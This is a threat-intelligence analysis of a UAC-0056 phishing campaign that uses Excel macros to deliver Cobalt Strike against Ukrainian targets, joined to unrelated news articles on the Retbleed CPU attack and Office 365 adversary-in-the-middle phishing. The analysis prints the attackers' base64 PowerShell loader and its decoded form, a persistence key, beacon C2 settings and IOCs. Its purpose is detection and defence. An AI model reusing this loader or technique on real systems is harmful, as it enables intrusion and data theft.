Let’s dig further into those relationships. UA-CERT has attributed the document named “_Information on the availability of **vacancies** and their staffing.xls_” to UAC-0056. This file looked familiar to us and for good reason because the macro is nearly identical to the document we analyzed in our initial blog:

Figure 2: Detail of Vacancies and GoElephant dropper macros

In the most recent attack reported by UA-CERT (_**Humanitarian catastrophe** of Ukraine since February 24, 2022.xls_) we see an almost identical macro to the one used in another decoy document called _Help Ukraine.xls_:

Figure 3: Detail of Help Ukraine and Humanitarian catastrophe macros

The **Help Ukraine** lure, to our knowledge, has never been publicly documented before:

Figure 4: Help Ukraine lure used in late July

We were able to identify 7 different samples with that theme, including one (258a9665af7120d0d80766c119e48a4035ee3b68676076bf3ed6462c644fe7d0) that has some similarities with a previous attack:

Figure 5: Similarities between different versions

Also, in the past we have found comments regarding to a domain named ExcelVBA\[.\]ru. This document was contacting a suspiciously similar domain named excel-vba\[.\]ru.

Figure 6: Similarities between different versions (2)

Among victims, we find gov.ua emails being targeted. One of the texts used as email body in the last campaign was written in Ukrainian and translates to:

> _On February 24, 2022, the army of the terrorist state – the Russian Federation, intervened on the territory of Ukraine. In order to counter the propaganda of the Russian government, the State Department of Statistics at the Office of the President of Ukraine prepared a consolidated report on the dead citizens of Ukraine, on the citizens of Ukraine who were left without a home, on the citizens of Ukraine who lost their jobs, on the number of destroyed homes, on the number of destroyed businesses as a result of an act of aggression . This report shows all the data broken down by regions of Ukraine. Familiarize yourself and familiarize your colleagues with the real state of affairs. Glory to Ukraine_!
> 
> Translation of original email sent to victims

We will focus our analysis on these 3 newer templates. Exact names and paths are from 024054ff04e0fd75a4765dd705067a6b336caa751f0a804fefce787382ac45c1 (_Information on the availability of vacancies and their staffing.xls_). The analysis is still valid for the others, while minor changes exist between samples.

**write.bin**

The document will download an executable file named _write.bin_. Other attacks following the same scheme used different names for this file, including _Office.exe_, _baseupd.exe_ and _DataSource.exe_. The file is slightly obfuscated, and performs the following actions:

**Establishing persistence**

After some antidebug tricks, the registry key HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Check License is used to establish persistence. HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Update Checker, is checked first because that was the key used by previous versions of the malware.

Figure 7: Run key for persistence

**Dropping next stage**

Next step is dropping a file in _C:\\ProgramData\\TRYxaEbX_.  This file will be used later.

Figure 8: Powershell commandline shown in IDA Pro

The payload will execute the following powershell Base64 encoded command:

JABBADEAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAiAEMAOgBcAFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAFQAUgBZAHgAYQBFAGIAWAAiACkAOwAKACQAQgAxACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AEIAeQB0AGUAcwAoACIAQwBtAEEASgBuAGcAdgBkAEQAbQBpAFQAagBMAHgATgAiACkAOwAKACQAQQA9AHsAJABXACwAJABZAD0AJABBAHIAZwBzADsAJABYAD0AMAAuAC4AMgA1ADUAOwAwAC4ALgAyADUANQB8ACUAewAkAFoAPQAoACQAWgArACQAWABbACQAXwBdACsAJABZAFsAJABfACUAJABZAC4ATABlAG4AZwB0AGgAXQApACUAMgA1ADYAOwAkAFgAWwAkAF8AXQAsACQAWABbACQAWgBdAD0AJABYAFsAJABaAF0ALAAkAFgAWwAkAF8AXQB9ADsAJABXAHwAJQB7ACQAVQA9ACgAJABVACsAMQApACUAMgA1ADYAOwAkAFYAPQAoACQAVgArACQAWABbACQAVQBdACkAJQAyADUANgA7ACQAWABbACQAVQBdACwAJABYAFsAJABWAF0APQAkAFgAWwAkAFYAXQAsACQAWABbACQAVQBdADsAJABfAC0AYgB4AG8AcgAkAFgAWwAoACQAWABbACQAVQBdACsAJABYAFsAJABWAF0AKQAlADIANQA2AF0AfQB9ADsACgAkAEMAIAA9ACAAKAAmACAAJABBACAAJABBADEAIAAkAEIAMQApADsACgAkAEUAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBUAHkAcABlAE4AYQBtAGUAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAEMALAAwACwAJABDAC4ATABlAG4AZwB0AGgAKQA7AAoAJABFACAAPQAgACQARQAgAC0AUwBwAGwAaQB0ACAAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoATgBlAHcATABpAG4AZQA7AAoAZgBvAHIAZQBhAGMAaAAoACQARQBFACAAaQBuACAAJABFACkAewBpAGUAeAAgACQAKAAkAEUARQArACIAOwAiACkAOwB9ADsA

Figure 9: Write executable creating the previous detailed powershell command

The chunk before is Base64 encoded; which decodes to:

$A1 = [System.IO.File]::ReadAllBytes("C:\ProgramData\TRYxaEbX");

$A={$W,$Y=$Args;$X=0..255;0..255|%{$Z=($Z+$X[$_]+$Y[$_%$Y.Length])%256;$X[$_],$X[$Z]=$X[$Z],$X[$_]};$W|%{$U=($U+1)%256;$V=($V+$X[$U])%256;$X[$U],$X[$V]=$X[$V],$X[$U];$_-bxor$X[($X[$U]+$X[$V])%256]}};

$C = (& $A $A1 $B1);

$E = (New-Object -TypeName System.Text.UTF8Encoding).GetString($C,0,$C.Length);

$E = $E -Split [Environment]::NewLine;

foreach($EE in $E){iex $($EE+";");};

In short the file dropped in _C:\ProgramData\TRYxaEbX_ will be decrypted using CmAJngvdDmiTjLxN as key using the RC4 algorithm. This next PowerShell script will look like:

Figure 10: Decoded PowerShell stage

Here we can see some of the actions that will be taken:

*   Disable script logging
*   Disable Module Logging
*   Disable Transcription
*   Disable AMSI protection

After this step, another Base64 payload is decoded and executed:

Figure 11: Final PowerShell script

**Cobalt Strike payload deployed**

As it can be seen, the main functionality provided by this second PowerShell file is to inject shellcode. This shellcode can be 32 or 64 bit, and is a Cobalt Strike beacon with the following configuration:

**BeaconType**                    – HTTPS

**Port**                              – 443

**SleepTime**                       – 30000

**PublicKey\_MD5**              – defb5d95ce99e1ebbf421a1a38d9cb64

**C2Server**                         – skreatortemp.site,/s/08u1XdxChhMrLYdTasfnOMQpbsLkpq3o/field-keywords/

**UserAgent**                       – Mozilla/5.0\_Frsg\_stredf\_o21\_rutyyyrui\_type (Windows NT 10.0; Win64; x64; Trident/7.0; D-M1-200309AC;D-M1-MSSP1; rv:11.0) like Gecko\_10984gap

**HttpPostUri**                    – /nBz07hg5l3C9wuWVCGV-5xHHu1amjf76F2A8i/avp/amznussraps/

**Watermark**                      – 1580103824

By having a Cobalt Strike instance running on the victim’s machine, it is now fully compromised.

**Attacker probes the sandbox**

At the time of writing, malicious C&C servers seem to be down. However, on July 5 we saw active servers and successful connections to our test environment. The attackers actively sent reconnaissance commands to the machine, listing the content of several folders.

We were able to decode the network communications using Didier Steven’s excellent collection of Cobalt Strike tools.

Figure 12: Cobalt Strike communication decoded

We consider these actions preliminary moves to check whether the machine is a viable target or not before following up with other actions.

**Attribution to UAC-0056**

Based on recent attacks reported by CERT UA, as well as the similarities indicated at the beginning of the blog, we can attribute this attack with high confidence to UAC-0056.

Signatures contained in the Cobalt Strike beacons (watermark 1580103824 and public key defb5d95ce99e1ebbf421a1a38d9cb64), may be used to connect the attack to other groups. For instance, the public key should be unique among deployments, according to the CobaltStrike documentation.

However, it is important to note that in that case we cannot simply rely on a public key to attribute the sample we analyzed in this report. In fact, these signatures have been attributed to many different groups. Our assessment is that the group used a leaked version of Cobalt Strike and used the same private key as others, making attribution harder.

Malwarebytes users were protected against this campaign thanks to our Anti-Exploit layer.

**IOCs**

**Malicious Excel documents (Help Ukraine template)**

fe3bc87b433e51e0713d80e379a61916ceb6007648b0fde1c44491ba44dc1cb3  
c9675483ab362bc656a9f682928b6a0c3ff60a274ade3ceabac332069480605a  
1b95186ecc081911c3a80f278e4ed34ee9ef3a46f5cf1ae8573ac3a4c69df532  
258a9665af7120d0d80766c119e48a4035ee3b68676076bf3ed6462c644fe7d0  
e663bb4d9506e7c09bcf7b764d31b61d8f7dbae0b64dd4ef4e9d282e1909d386  
ecd2bb648a9ad28069c1ec4c0da546507797fdf0243e9e5eece581bf702675ff  
eac9a4d9b63a0ca68194eae433d6b2e9a4531b60b82faf218b8dd4b69cec09df

**Malicious Excel documents (Humanitarian template)**

024054ff04e0fd75a4765dd705067a6b336caa751f0a804fefce787382ac45c1  
14736be09a7652d206cd6ab35375116ec4fad499bb1b47567e4fd56dcfcd22ea  
474a0f0bb5b17a1bb024e08a0bb46277ba03392ee95766870c981658c4c2300d

**Payloads**

0709a8f18c8436deea0b57deab55afbcea17657cb0186cbf0f6fcbb551661470  
aadd8c7c248915c5da49c976f24aeb98ccc426fb31d1d6913519694a7bb9351a  
fb2a9dcfcf41c493fb7348ff867bb3cad9962a04c9dfd5b1afa115f7ff737346  
501d4741a0aa8784e9feeb9f960f259c09cbceccb206f355209c851b7f094eff

**Cobalt Strike beacon and payloads**

136.144.41\[.\]177  
syriahr\[.\]eu/s/Xnk75JwUcIebkrmENtufIiiKEmoqBN/field-keywords/  
syriahr\[.\]eu/nzXlLVas-VALvDh9lopkC/avp/amznussraps/  
skreatortemp\[.\]site  
imolaoggi\[.\]eu

Cobalt Strikes again: UAC-0056 continues to target Ukraine in its latest campaign

The exploit can leak password information and other sensitive material, but the chipmakers are rolling out mitigations.

Some microprocessors from Intel and AMD are vulnerable to a newly discovered speculative execution attack that can covertly leak password data and other sensitive material, sending both chipmakers scrambling once again to contain what is proving to be a stubbornly persistent vulnerability.

Researchers from ETH Zurich have named their attack Retbleed because it exploits a software defense known as retpoline, which chipmakers introduced in 2018 to mitigate the harmful effects of speculative execution attacks. Speculative execution attacks, also known as Spectre, exploit the fact that when modern CPUs encounter a direct or indirect instruction branch, they predict the address for the next instruction they’re about to receive and automatically execute it before the prediction is confirmed. Spectre works by tricking the CPU into executing an instruction that accesses sensitive data in memory that would normally be off-limits to a low-privileged application. Retbleed then extracts the data after the operation is canceled.

Is It a Trampoline or a Slingshot?

Retpoline works by using a series of return operations to isolate indirect branches from speculative execution attacks, in effect erecting the software equivalent of a trampoline that causes them to safely bounce. Stated differently, a retpoline works by replacing indirect jumps and calls with returns, which many researchers presumed weren’t susceptible. The defense was designed to counter variant 2 of the original speculative execution attacks from January 2018. Abbreviated as BTI, the variant forces an indirect branch to execute so-called gadget code, which in turn creates data to leak through a side channel.

Some researchers have warned for years that retpoline isn’t sufficient to mitigate speculative execution attacks because the returns retpoline used were susceptible to BTI. Linux creator Linus Torvalds famously rejected such warnings, arguing that such exploits weren’t practical.

The ETH Zurich researchers have conclusively shown that retpoline is insufficient for preventing speculative execution attacks. Their Retbleed proof-of-concept works against Intel CPUs with the Kaby Lake and Coffee Lake microarchitectures as well as with AMD Zen 1, Zen 1+, and Zen 2 microarchitectures.

“Retpoline, as a Spectre-BTI mitigation, fails to consider return instructions as an attack vector,” researchers Johannes Wikner and Kaveh Razavi wrote. “While it is possible to defend return instructions by adding a valid entry to the RSB return stack buffer before executing the return instruction, treating every return as potentially exploitable in this way would impose a tremendous overhead. Previous work attempted to conditionally refill the RSB with harmless return targets whenever a perCPU counter that tracks the call stack depth reaches a certain threshold, but it was never approved for upstream. In the light of Retbleed, this mitigation is being re-evaluated by Intel, but AMD CPUs require a different strategy.”

In an email, Razavi explained it this way:

_Spectre variant 2 exploited indirect branches to gain arbitrary speculative execution in the kernel. Indirect branches were converted to returns using the retpoline to mitigate Spectre variant 2._

_Retbleed shows that return instructions unfortunately leak under certain conditions similar to indirect branches. These conditions are unfortunately common on both Intel (Skylake and Skylake-based) and AMD (Zen, Zen+ and Zen2) platforms. This means that retpoline was unfortunately an inadequate mitigation to begin with._

In response to the research, both Intel and AMD advised customers to adopt new mitigations that the researchers said will add as much as 28 percent more overhead to operations.

Retbleed can leak kernel memory from Intel CPUs at about 219 bytes per second and with 98 percent accuracy. The exploit can extract kernel memory from AMD CPUs with a bandwidth of 3.9 kB per second. The researchers said that it’s capable of locating and leaking a Linux computer’s root password hash from physical memory in about 28 minutes when running the Intel CPUs and in about six minutes for AMD CPUs.

Retbleed works by using code that essentially poisons the branch prediction unit that CPUs rely on to make their guesses. Once the poisoning is complete, this BPU will make mispredictions that the attacker can control.

“We found that we can inject branch targets that reside inside the kernel address-space, even as an unprivileged user,” the researchers wrote in a blog post. “Even though we cannot access branch targets inside the kernel address-space—branching to such a target results in a page fault—the Branch Prediction Unit will update itself upon observing a branch and assume that it was legally executed, even if it's to a kernel address.”

Intel and AMD Respond

Both Intel and AMD have responded with advisories. Intel has confirmed that the vulnerability exists on Skylake-generation processors that don’t have a protection known as enhanced Indirect Branch Restricted Speculation (eIBRS) in place.

“Intel has worked with the Linux community and VMM vendors to provide customers with software mitigation guidance which should be available on or around today's public disclosure date,” Intel wrote in a blog post. “Note that Windows systems are not affected given that these systems use Indirect Branch Restricted Speculation (IBRS) by default which is also the mitigation being made available to Linux users. Intel is not aware of this issue being exploited outside of a controlled lab environment.”

AMD, meanwhile, has also published guidance. “As part of its ongoing work to identify and respond to new potential security vulnerabilities, AMD is recommending software suppliers consider taking additional steps to help guard against Spectre-like attacks,” a spokesman wrote in an email. The company has also published a white paper.

Both the researchers’ research paper and blog post explain the microarchitectural conditions necessary to exploit Retbleed:

_**Intel**. On Intel, returns start behaving like indirect jumps when the Return Stack Buffer, which holds return target predictions, is underflowed. This happens upon executing deep call stacks. In our evaluation we found over a thousand of such conditions that can be triggered by a system call. The indirect branch target predictor for Intel CPUs has been studied in_ _previous work__._

_**AMD**. On AMD, returns will behave like an indirect branch regardless of the state of their Return Address Stack. In fact, by poisoning the return instruction using an indirect jump, the AMD branch predictor will assume that it will encounter an indirect jump instead of a return and consequentially predict an indirect branch target. This means that any return that we can reach through a system call can be exploited—and there are tons of them._

In an email, Razavi added: “Retbleed is more than just a retpoline bypass on Intel, specially on AMD machines. AMD is in fact going to release a white paper introducing Branch Type Confusion based on Retbleed. Essentially, Retbleed is making AMD CPUs confuse return instructions with indirect branches. This makes exploitation of returns very trivial on AMD CPUs.”

The mitigations will come at a cost that the researchers measured to be between 12 percent and 28 percent more computational overhead. Organizations that rely on affected CPUs should carefully read the publications from the researchers, Intel, and AMD, and be sure to follow the mitigation guidance.

_This story originally appeared on_ _Ars Technica__._

New ‘Retbleed’ Attack Can Swipe Key Data From Intel and AMD CPUs

The massive phishing campaign does not exploit a vulnerability in MFA. Instead, it spoofs an Office 365 authentication page to steal credentials.

Microsoft recently discovered a widespread phishing attack campaign targeting Office 365 users that lures victims to a phony Office authentication page where it pilfers their credentials and later executes a second wave of attack, business email compromise (BEC), using intel gathered from their email accounts.

The attackers behind the campaign have targeted more than 10,000 organizations since September 2021, according to Microsoft, and employ the Evilginx2 phishing kit as the infrastructure for hijacking the authentication process. "We also uncovered similarities in their post-breach activities, including sensitive data enumeration in the target’s mailbox and payment frauds," according to a post by the Microsoft 365 Defender Research Team that details the attacks.

The man-in-the-middle attack — or, as Microsoft now calls it, adversary-in-the-middle (AiTM) — sets up a proxy server that sits between the victim and the actual authentication page. "Such a setup allows the attacker to steal and intercept the target's password and the session cookie that proves their ongoing and authenticated session with the website. Note that this is not a vulnerability in MFA; since AiTM phishing steals the session cookie, the attacker gets authenticated to a session on the user’s behalf, regardless of the sign-in method the latter uses," Microsoft said in its post.

Organizations should up their MFA game with conditional access policies, which vet sign-in requests based on identity, IP location, and device status, for example, according to Microsoft.

Keep up with the latest cybersecurity threats, newly-discovered vulnerabilities, data breach information, and emerging trends. Delivered daily or weekly right to your email inbox.

Subscribe

Tag

#intel